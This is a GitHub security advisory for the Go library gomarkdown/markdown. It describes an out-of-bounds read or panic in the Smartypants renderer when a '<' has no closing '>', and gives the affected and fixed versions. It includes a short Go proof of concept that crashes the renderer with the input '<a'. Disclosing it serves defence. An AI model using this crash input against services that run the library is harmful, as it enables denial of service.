GHSA-77fj-vx54-gvh7

Processing a malformed input containing a < character that is not followed by a > character anywhere in the remaining text with a SmartypantsRenderer will lead to Out of Bounds read or a panic.

Details

The smartLeftAngle() function in html/smartypants.go:367-376 performs an out-of-bounds slice operation when processing a < character that is not followed by a > character anywhere in the remaining text. https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376 If the length of the slice is lower than its capacity, this leads to an extra byte of data read. If the length equals the capacity, this leads to a panic.

PoC

package main

import (
    "bytes"
    "fmt"

    "github.com/gomarkdown/markdown/html"
)

func main() {
    src := []byte("<a")

    fmt.Printf("Input: %q  (len=%d, cap=%d)\n", src, len(src), cap(src))

    var buf bytes.Buffer
    sp := html.NewSmartypantsRenderer(html.Smartypants)
    sp.Process(&buf, src) // panics: slice bounds out of range

    fmt.Printf("Output: %q\n", buf.String())
}

Impact

This vulnerability will lead to a Denial of Service / panic on the processing service.

-- The Datadog Security Team

Database specific

{
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-125"
    ],
    "nvd_published_at": null,
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-14T22:38:20Z"
}

References

Affected packages

Go / github.com/gomarkdown/markdown

Package

Name: github.com/gomarkdown/markdown; View open source insights on deps.dev
Purl: pkg:golang/github.com/gomarkdown/markdown

Affected ranges

Type: SEMVER
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

0.0.0-20260411013819-759bbc3e3207

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-77fj-vx54-gvh7/GHSA-77fj-vx54-gvh7.json"